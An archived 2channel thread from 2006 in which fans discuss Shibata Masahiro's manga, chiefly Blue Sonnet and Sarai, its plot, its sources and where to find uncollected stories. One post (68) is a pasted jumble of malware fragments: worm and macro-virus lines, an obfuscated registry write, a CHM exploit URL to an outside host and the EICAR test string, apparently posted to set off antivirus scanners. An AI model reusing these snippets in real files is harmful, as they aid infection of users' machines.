5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

〓柴田昌弘作品を語るスレ・2〓

1 :花と名無しさん:2006/08/22(火) 00:27:03 ID:???0
前スレ
〓柴田昌弘作品を語るスレ〓
http://comic6.2ch.net/test/read.cgi/gcomic/1120984352/l50


2 :花と名無しさん:2006/08/22(火) 00:30:05 ID:???0
アハハハハハハ!

3 :花と名無しさん:2006/08/22(火) 00:30:51 ID:???0
代表作「紅い牙シリーズ」で、男性作家ながら
少女漫画誌「花とゆめ」で大活躍した柴田氏の作品を
大いに語るスレです。
原則:sage進行(荒らしよけ)でお願いします。

■次スレは、980を踏んだ方お願いします。

■過去スレ「柴田昌弘について語れる人っている?」
http://comic6.2ch.net/test/read.cgi/gcomic/1069272997/


4 :前スレ972、980:2006/08/22(火) 00:33:25 ID:???0
>>1
正式には3なんだが…。ってか2週間もじっと我慢して意見聞いていたのに、
いきなりスレ立てすんなよ。

5 :花と名無しさん:2006/08/22(火) 00:57:20 ID:???0
まあ立っちまった物はしょうがない
テキトーに使っていこうぜ。あくまでテキトーにな。

6 :花と名無しさん:2006/08/22(火) 01:01:08 ID:???0
>>4
イ`

書き込みしないで落とした方がイイ

7 :花と名無しさん:2006/08/22(火) 04:55:19 ID:???0
なんで話の流れ無視して立てるかなー。

8 :花と名無しさん:2006/08/22(火) 12:21:24 ID:tyQiR/W+0
晒しage

9 :花と名無しさん:2006/08/22(火) 21:57:39 ID:???0
俺はこっちで続けてもいいと思うけど。
少女漫画時代を重点的に語りゃいいじゃん。
堅いこと言わずに。

10 :花と名無しさん:2006/08/22(火) 22:03:57 ID:TKE5BxCS0
ブルーソネット連載時の読者投稿を思い出す・・
「なんであんなに短いスカートはかなきゃならないんですか?なんで服が破れるときはいつも胸なんですか?」

11 :花と名無しさん:2006/08/23(水) 00:30:46 ID:???0
柴田さんのカレンダーにつけてたコメント思い出した。
創作意欲の源泉はスケベマインドだそうですよw

12 :花と名無しさん:2006/08/23(水) 01:32:40 ID:???0
をとこだもの.゚+.(・∀・).+゚.

13 :花と名無しさん:2006/08/23(水) 02:11:38 ID:???0
>>9
少女漫画板のルールに乗っ取ってない

14 :花と名無しさん:2006/08/23(水) 05:31:12 ID:???0
ルールなど破るためにあるものさ。(´ー`)y─┛~

15 :花と名無しさん:2006/08/23(水) 12:34:21 ID:???0
          ┌┬┬┬┐
    ―――┴┴┴┴┴―――――、
.  . /  ̄ ̄ ̄//. ̄ ̄| || ̄ ̄ ̄||| ̄ ||    __________
  ./    ∧// ∧ ∧| ||      |||   ||  /
 [/____(゚_//[ ].゚Д゚,,) ||___|||   || <  >>14を迎えに来ました
. ||_. *  _|_| ̄ ̄ ∪|.|.       |ヽ.__||  \__________
. lO|o―o|O゜.|二二 |.|    救済病院 ||
 .| ∈口∋ ̄_l__l⌒l_|___|_l⌒l._||
   ̄ ̄`ー' ̄   `ー'  `ー'   `ー'


16 :花と名無しさん:2006/08/26(土) 16:57:21 ID:???0
和田慎二のスレもあることだしここでいいんじゃないの?

17 :花と名無しさん:2006/08/26(土) 17:25:40 ID:???0
和田慎二は現役の少女漫画家。柴田昌弘は最早少女漫画家ではない。

18 :花と名無しさん:2006/08/26(土) 19:21:55 ID:???0
なんでここに立てるんだよ・・>>はアフォだな

19 :花と名無しさん:2006/08/26(土) 19:24:06 ID:???O
柴田さんがミスボ等少女誌で連載しているなら、この板がいいけど…
ヤングキングじゃね…論外…┐(´〜`;)┌

20 :花と名無しさん:2006/08/27(日) 01:07:58 ID:???0
相変わらず腐女子は頭が固いね。

21 :花と名無しさん:2006/08/27(日) 10:47:18 ID:???0
腐女子=オタ女 ではないんだがなあ。
801やってる女以外を腐女子と呼んではいかんよ>>20

22 :花と名無しさん:2006/08/27(日) 11:24:40 ID:???0
頭が腐ってるのは一緒

23 :花と名無しさん:2006/08/27(日) 21:14:11 ID:???0
自分の間違いくらいは認めなよ('A`)

24 :花と名無しさん:2006/08/27(日) 22:31:52 ID:???0
立ってしまった物はしょうがない。適当に使っていこうよ。

25 :花と名無しさん:2006/08/27(日) 22:39:42 ID:???0
誘い受けウザ

26 :花と名無しさん:2006/08/27(日) 23:04:26 ID:???0
16巻買ってきた。


27 :花と名無しさん:2006/08/28(月) 03:45:32 ID:???O
17&18巻が見つからない、カナシス
ソネット良い子だなー、今となってはソネタンのが好きだ

28 :花と名無しさん:2006/08/28(月) 13:27:35 ID:???O
「サライ」16巻
>■発売日は8月28日です。よろしく。(^^)

【紅い牙シリーズ】ブルーソネット【柴田昌弘】
http://comic6.2ch.net/test/read.cgi/rcomic/1141573942/

29 :花と名無しさん:2006/09/03(日) 13:20:58 ID:???0
前から自分勝手に妄想してたチラシの裏な内容ですまないんだが・・・
みんなソネットの母親って本当にソネットの母親だと思ってた?
俺は実はソネットが赤ん坊の頃、ソネット母子が入院してた病院で火災があって
火事場のドサクサで母親が自分の子供とは別の赤ん坊を取り違えてしまったと
(真偽はともかく)ソネットの母親自身は信じ込んでいたんじゃないかと勝手に思っていました。

いくら極限状態のスラム街で父親もおらずに自分も仕事があるわけじゃなく
娘に身体を売らせなきゃ生活できないような環境だったとしても
あそこまでなんの未練もなく自分の娘を捨てる親ってちょっと考えられない。
本当は実の親子だった可能性はあったとしても
少なくとも母親自身はソネットが自分の実の娘だとは思っていなかったのではないか。
「あんな気味の悪い子が私の娘なぞであるものか」という台詞から察するに、
養子をとったとか、捨て子を拾って一緒に暮らしたとかでもなさそうだ。
少なくとも母親自身娘を産んでるはず。
それを自分の娘であるとは思えない(感情的にじゃなくて理性的に思えない)からこそ
平気で身体を売らせたし、挙句に客の1人に殺させようとしたうえで何の負い目もなく捨てて去った。
ソネットが醜い化け物になったとか殺人狂や植物人間になったとかならともかく
超能力が使えるようになったことを除けば普通の少女なんだし
母親のソネットに対する愛情のかけらもない仕打ちは
実子と思っていないからこそのものだと感じていたのは俺だけかなあ。
何度も言うけど実際に赤の他人だったかどうかはまた別の話として。

30 :花と名無しさん:2006/09/03(日) 14:37:50 ID:???0
おまいだけです。

31 :花と名無しさん:2006/09/03(日) 14:43:01 ID:???0
確かにあの母親には違和感があったが、ソネットが父親似なんだろうと
思ってた。

32 :花と名無しさん:2006/09/03(日) 15:18:30 ID:???0
似てるとか似てないとかじゃなくて
母親がソネットに対して愛情のかけらもなかったことを話題にしているんだが。

33 :花と名無しさん:2006/09/03(日) 17:47:52 ID:???0
そんな母親はきょうびでもいくらでもいるじゃん。
映画「キャリー」の母親もソネットの母親に似てなかったか?
確かクリスチャンで娘がESP能力を持ってたのを悪魔付きと恐れて殺そうとする話しじゃないっけ。
「ブルソネ」はESPの表現とか「スキャナーズ」に触発されたのかなと思うけど、
当時あの無茶苦茶ダークで絶望的なイントロはゾクゾク来てはまったなー。

34 :花と名無しさん:2006/09/03(日) 18:08:14 ID:???0
母性に夢見すぎてないか。
児童虐待の本でも読んでみたら?

35 :花と名無しさん:2006/09/03(日) 19:51:57 ID:???0
「サライ」とりとめない作品だなーと思ってたけど結構面白くなったかな
エロがない方がいいや
まあ単行本派なんでここ最近どうなってるかは知らないんだけど

36 :花と名無しさん:2006/09/03(日) 20:54:20 ID:???0
ソネットは、能力的には人間とはいえない怪物(美人だが)。
人間とはいえない奇怪な生物を自分の子供とは思えない、というのは当然だと思うが。

37 :花と名無しさん:2006/09/05(火) 02:45:48 ID:???0
>>29
34に同意。
虐待関係のNPOに関わっていたことがあったけど、娘に身体を
売らせたり、もっと酷いのになると自分の妻の地位を守るために、
娘を夫(娘からしたら実父か養父)に人身御供として差し出して
レイプさせたりする母親なんて珍しくなかった。

ソネットの母親もそういうタイプだったんでしょ。
その上、彼女の人間離れした超能力を知ったら近親憎悪も加わって、
赤の他人以上に恐れたり薄気味悪く思ったりするのもあり得ると思う。

38 :花と名無しさん:2006/09/05(火) 13:27:31 ID:???0
そこって、そんなに熱く語る所じゃ無い希ガス

39 :花と名無しさん:2006/09/05(火) 23:57:17 ID:???0
>>38
気になるポイントは人それぞれってことでは。

40 :花と名無しさん:2006/09/06(水) 00:04:25 ID:???0
ソネットの母親に関しては、荒れた暮らしをしてた不細工なのに
ちゃっかりまともそうな結婚相手をゲトしてたのが一番不思議だった。

41 :花と名無しさん:2006/09/06(水) 00:12:58 ID:???0
他の漫画には娘がそんな力持ってて
その力は使っちゃダメ!皆に殺されてしまう
そんな力を持って産んでしまってごめんね…て
涙してる親もいるのになー

>40
そりゃー隠しますわな 娘がいることすら言ってないでしょ

42 :花と名無しさん:2006/09/06(水) 00:21:48 ID:???0
みんな気にならないのか。結構ドライなんだな。
虐待の事実とかは頭では理解できても仮に自分の近親者がそんなことしてたら
凍りついちゃうけどな。

43 :花と名無しさん:2006/09/06(水) 00:29:24 ID:???0
みんな、ソネットのお母さんとは血がつながってないから、
別に凍りつかない。それだけだ。

44 :花と名無しさん:2006/09/06(水) 00:30:56 ID:???0
>>42
>>29の1行目にある通りチラ裏としか思えない妄想で、何とも思わない。

45 :花と名無しさん:2006/09/06(水) 04:20:15 ID:???0
ソネットが不幸になればなるほど、ブルーソネットは面白くなるんだよ。

46 :花と名無しさん:2006/09/06(水) 07:24:53 ID:???0
娘に売春させる親は貧困社会には結構いるだろうけど
あの母親、客に頼んでソネットを殺そうとしてるんだよね。
別に自分がソネット捨ててスラム街から出て行くのに
ソネットを殺す必要性は何もないのに。
徹頭徹尾悪役としてしか描かれていないね。

47 :花と名無しさん:2006/09/06(水) 09:30:20 ID:???0
後を追いかけてきたら困るから始末したって言い訳ができなくもないが
それなら殺しを依頼した客のがソネットよりもヤバイよねw
あの母が分かりやすく薄っぺらい悪役なのは、しょせんソネットを切れさせて
なおかつその理由を正当化するための装置にすぎないからじゃない?
こんなに酷い目にあっては仕方ないってことにするための仕込みネタ。

思ったんだが、掲載がもう10年昔だったらソネットがスラム在住でも
かっぱらいかスリやるくらいで売春はしてなかったかもなあ。


48 :花と名無しさん:2006/09/07(木) 09:11:16 ID:???0
そう言えば過去スレにリアルタイムで(?)読んでた人の感想に
「第1話でソネットが何をしていたのか理解できない厨房でした」てのがあったっけ。
当時の小学生〜中学1年生位の読者にとって
白人少女がいきなり黒人男に身体売るシーンてのは
厳しいものがあったんじゃなかろうか。そうでもなかったのかな。

49 :花と名無しさん:2006/09/07(木) 15:05:31 ID:???0
白人黒人は関係ないんじゃないかなー。
むしろ女の子・大人の男って組み合わせの方がリアル子供にとってはわかりやすい恐怖だと思う。
自分より大きなものにのしかかられたら怖いっていうのは体を売るとか理解できなくてもわかるし。

っていうか自分が内容わかってなくて「よくわかんないけどソネットはとても可哀想な身の上の子
だってことなんだな」くらいに思ってた。
「鬼が襲ってきた→悪い鬼ですね→桃太郎が退治しました」が正当化されるみたいな感じの
その後の暴力的に怖いシーンが「こうなっちゃうのも仕方がない」ほど悲惨な境遇を表す
記号みたいな認識っていうのかな。

マンガの中の暴力が身につまされる状況だったり性に対して意識する年頃だと厳しいだろうと思うけど
個人的には子供が売春させられること(意味がわからない)とエスパーに殺される(殺されたのはわかる)のの
現実感のなさが等価で、どっちかというとブルソネ以前の話があるらしいのにそれがどこにあるかわからない状況
の方が大問題だった。
明日香も前の話がどこにあるかわからなくて本筋と離れたところでモヤモヤしていた。

「マジで理解できない」レベルの子供だとこんな感じっす。

50 :花と名無しさん:2006/09/07(木) 16:59:04 ID:???O
友人に頼んで自分の母親を殺し、父親殺害も目論む少年もいるしな。
>29は最近のニュースを全く見てないか、見ててもその先に生身の人間が存在するという事を認識できないんじゃね?
キツイ言い方かも知れないが、人情家ぶった偽善者のような希ガス。


51 :花と名無しさん:2006/09/07(木) 17:08:06 ID:???0
>>49
作者の描き方も記号的というか適当なやっつけ感が漂う>売春・母親ネタ
あと、主要キャラをこれだけ汚してみましたってウットリ感。
母親に徹底的に捨てられたのを描くのに
酷ければ酷いほどいいって感じでエスカレートして
結果、当時の少女誌にしては衝撃的ーみたいな。

52 :花と名無しさん:2006/09/07(木) 21:02:43 ID:???0
いや別に人情家ぶった偽善者呼ばわりしてもかわまわないけどさ。
「最近のニュースを見ててその先に生身の人間が存在するという事を認識する」とかいうけど
そんなのここで書き込みしたくらいでひとそれぞれが
どれぐらい認識してるかなんて測れるわけねーじゃん。
あんたは自分の親とか配偶者がそういうことしてても平気なのかな。
俺には絶対耐えられません。

53 :花と名無しさん:2006/09/07(木) 21:37:00 ID:???0
>>50宛に召還すんなとレスしようとしたらもう来てた

54 :花と名無しさん:2006/09/07(木) 21:39:44 ID:???0
人情家ぶってるかはわからんがソネットの母親がソネットにああいう当たり方をしてるのは
母親の方が「本当の親子じゃない」と思ってるからだって発想には
自分が叱られるようなことをしたことを棚にあげて
「お母さんがこんなにひどく言うのは本当の親子じゃないからだ。
 きっとわたしは拾われっ子なんだ。
 本当のお父さんお母さんはきっとどこかにいるんだ」って
考えてる子供の発想に近いものを感じる。

55 :花と名無しさん:2006/09/07(木) 21:44:03 ID:???0
>>52
ソネットの母の再婚相手の方ですか?

56 :花と名無しさん:2006/09/07(木) 21:46:19 ID:???0
>>52
> そんなのここで書き込みしたくらいでひとそれぞれが
> どれぐらい認識してるかなんて測れるわけねーじゃん。

っていうけどさ

> あんたは自分の親とか配偶者がそういうことしてても平気なのかな。

これだって測ってることになるじゃんwww

57 :花と名無しさん:2006/09/07(木) 21:55:31 ID:???O
>>52
>あんたは自分の親とか配偶者がそういうことしてても平気なのかな。
俺には絶対耐えられません。

親どころか自分自身だって例外じゃないと思ってる。このテの話は誰もが他人事じゃない。そう言ってる君だってね。人はいつどこで心の闇に堕ちるかわからない。なぜならそれは誰もが持っているのだから。人間なんてそんなもの。

言い方がキツかったかも知れないが、俺は君のような現実認知ができない人間が問題を悪化させてる気がする。

耐えられない?じゃあどうする?それで終わり?それじゃなんにも解決しないぜ?

いるんだよ!現実にこんな屑が存在するんだよ!



58 :花と名無しさん:2006/09/07(木) 22:10:48 ID:???0
ソネット母の再婚相手だったのか。

59 :花と名無しさん:2006/09/07(木) 23:35:22 ID:???0
>>46
ソネットが、ESPを持つ「魔女」だから殺しておきたかったんだろ。
「超能力者が、一般人から憎まれる」というのは、SFでは基本中の基本のストーリー。
しかも、柴田さんは特にその手のテーマがお好き。
そもそも「人間と「古代超人類」の対立」が紅い牙シリーズの基本設定。

ソネット母の行動は、SFを読みなれているとありふれた話だから違和感ないんだけど、
SFをあまり読んでない人には理解しがたいかも。

60 :花と名無しさん:2006/09/07(木) 23:59:55 ID:???O
>59
異端者への憎悪ってのはSFに限った話じゃないけどな。最近では「ホテル・ルワンダ」か。



61 :花と名無しさん:2006/09/08(金) 02:19:22 ID:???0
単なる異端者への憎悪というだけじゃなくて、
「自分より優れた者への無能な大衆の憎悪」という構図。

でもソネットは本当は大衆の敵ではなく、
大衆の本当の敵はTARON=軍事独占資本だという、一昔前のブサヨ世界観そのもの

62 :花と名無しさん:2006/09/08(金) 23:59:41 ID:SspbVH0b0
 タロンを構成する「N」のニージニー=タギールは(名前からして)
ソ連の企業。

63 :花と名無しさん:2006/09/09(土) 00:04:10 ID:???0
シンダルシャハ油田

64 :花と名無しさん:2006/09/10(日) 04:26:22 ID:???0
柴田さんは「反帝(反帝国主義)反スタ(反スターリン=反ソ連)」なトロツキスト

65 ::2006/09/12(火) 03:42:08 ID:???0



      ゙ミ;;;;;,_ミ;;;;;;;;、;:..,,.,,,,,
       i;i;i;i; '',',;^′..ヽ
       ゙ゞy、、;;;;; ) }
        .¨.、,_ _,,r_,ノ
      /;:;":;.:;";i; ;;;;;;_~;;;′.ヽ
     ゙{y、、;:...:,:.:. ,:.:. ._   、}
     ".¨ー=v ''‐  、,,、_,r_,ノ
    /;i;i; '',',;;;_~;;; ;;;;;ヾ.ミ゙´゙^′..ヽ 
    ゙{y、、;:...:,:.:.、;;; :. ._  .、)  、}
   /i;i; '',',;;;_~υ⌒  ;;;ヾ.ミ゙´゙^′.ソ.
  ゙{y、、;:..ゞ.:,:.:.、;::.:. ._υ゚o,,'.、)  、}
・〜ヾ,,..;::;;;::,;,::;):;:;:; .冫_._ .、,_,,、_,,r_,ノ′

66 :花と名無しさん:2006/09/23(土) 01:13:07 ID:???0
 御本人のHPによれば、やっと気力が戻って来たとの事。
まずは慶賀。

67 :花と名無しさん:2006/10/10(火) 02:46:48 ID:ICgvyDwO0
hosyu

68 :<body onload=window()>:2006/10/10(火) 18:18:06 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

69 :花と名無しさん:2006/10/18(水) 03:53:43 ID:???0
フリッカに萌えてサライを揃えた
あほの娘はええのぅ
特に笑顔が素敵だ

70 :花と名無しさん:2006/10/31(火) 22:30:51 ID:pzSlEJJr0
hage

71 :花と名無しさん:2006/11/01(水) 01:14:25 ID:O+PXmSsE0
柴田昌弘の本集めてて、すっごい好きだった。
「未来都市バラン」とか、「よくこういうキャラとか考えるなあ」
って感心してたのに、
殆どがウェルズの「タイムマシン」のパクリと知ってショックだった・・・。

72 :花と名無しさん:2006/11/01(水) 01:32:48 ID:???0
へーそうだったんだ。この人のそういうネタ元話とかって初めて知った。
よければもう少し教えてください。
白泉初期の読切作品は皆好きだ。
簡潔ながら多種で、どれも印象に残るもので、若かった自分はワクワクしながら何度も読んだ。
そういう意味では確かに当時の若い読者にとってウエルズやドイル的役割であったのかも。
「ローレライ」「赤い仔猫」が特に好きで、以来スカイパニック映画が好きになったな。

73 :花と名無しさん:2006/11/01(水) 13:28:23 ID:???0
>>71
パクっていうか、これくらい知ってるのが前提みたいな
感じだったのかも。

大昔は翻訳含めSF小説なんて数限られてたから
このあたり読んでる人はあの辺も読んでる(に決まってる)みたいな
甘くゆるい共通認識があった気がする。
2-30年位前のSFアクション伝奇系の漫画家だったら
ウルフガイ読んでる人は多いだろーみたいな。

74 :花と名無しさん:2006/11/02(木) 12:17:38 ID:???0
なんも書いてなくても翻案とかも多かったよね。
ファンタジー・SF・ミステリーとか多かった。

75 :花と名無しさん:2006/11/04(土) 22:40:43 ID:???0
>>73
和田慎二も自分のイラストでウルフガイの小説を手に持ってる
自画像があったね。

76 :花と名無しさん:2006/11/27(月) 02:24:53 ID:L5TC4/DP0
かわいい

77 :花と名無しさん:2006/11/28(火) 20:29:49 ID:???0
久々に「グリーン・ブラッド」下ネタつーか疑問。
レパを始めGBって一代生命体だけど人間体男性の場合
(一時期のバードのネタじゃないが)可能なのか?
「緑のペガサス」でペガサスの子供が生まれたし、
イフェは監視人に犯されそうになっているのでその部分まで
作っているのは解るがw


78 :花と名無しさん:2006/11/29(水) 01:12:59 ID:???0
>>77
男性はやれるの?って事だったら可能だと思う。
種無しって事じゃないかな。

確かGBは一代生命体である事がネックだったが
ペガサスが子供産んだ事で種族依存の希望が持てたって
感じじゃなかったっけ?

そういや監視人は命がけで犯そうとしてたなw

79 :花と名無しさん:2006/11/30(木) 00:37:26 ID:???0
過去スレにあったかも知れないのだが、質問なんだけど・・・・
「サライ」の連載前に、柴田作品の読み切りが、幾つか在ったのだが。
単行本に、成っているのでしょうか?
「マグノリア」・「蟲使い」
そして同居人だか家族が、アンドロイドだったという話。
知っている方、教えて下さい。


80 :花と名無しさん:2006/11/30(木) 01:28:45 ID:???0
>>79
公式サイトにリストないの?

81 :花と名無しさん:2006/11/30(木) 03:57:33 ID:???O
>>79
検索サイト「Google」http://www.google.co.jp/ (携帯からでも使えます!)
柴田氏のファンサイトに二つ〜三つ詳細に作品リストを作成している
ところがあるので、作家名で検索を勧める。
その作品名には見覚えあるが、コミクス化したかどうか微妙…。
自分も全部はコンプリートできていないので、リスト作った人は凄いと感心する。

82 :79:2006/12/05(火) 00:19:44 ID:???0
>>80 >>81
どうも、ありがとう。
私も、とある人の作品リストサイトに行ってきました。
見ると、過去の未収録とかが、次々と発刊されていた90年代半ばの作品自体が、
また、新たな未収録作品になっているンですね。
困ったもんだ・・・。



83 :花と名無しさん:2006/12/07(木) 20:27:49 ID:???0
鼻腔類? 鼻が異様に発達した動植物がいる世界に迷い込んだ話の
題名分かる方、いらっしゃいますか。

84 :花と名無しさん:2006/12/07(木) 20:50:15 ID:???0
>>83
ttp://www.google.co.jp/search?hl=ja&q=%E9%BC%BB%E8%A1%8C%E9%A1%9E+%E6%9F%B4%E7%94%B0%E6%98%8C%E5%BC%98&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=

85 :花と名無しさん:2006/12/08(金) 09:00:54 ID:???0
ミッシングアイランズだよ

86 :花と名無しさん:2006/12/11(月) 00:05:25 ID:???0
個人的には、吸血鬼(つーか、食人鬼?)の話と、壺魔法の話が好き。
あと、昔マーガレットで書いてた珈琲店の話。

87 :83:2006/12/18(月) 00:51:26 ID:???0
<<84<<85
ありがとうございます

88 :花と名無しさん:2007/01/06(土) 12:02:32 ID:psJd1tC90


¢







¢







¢



24 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)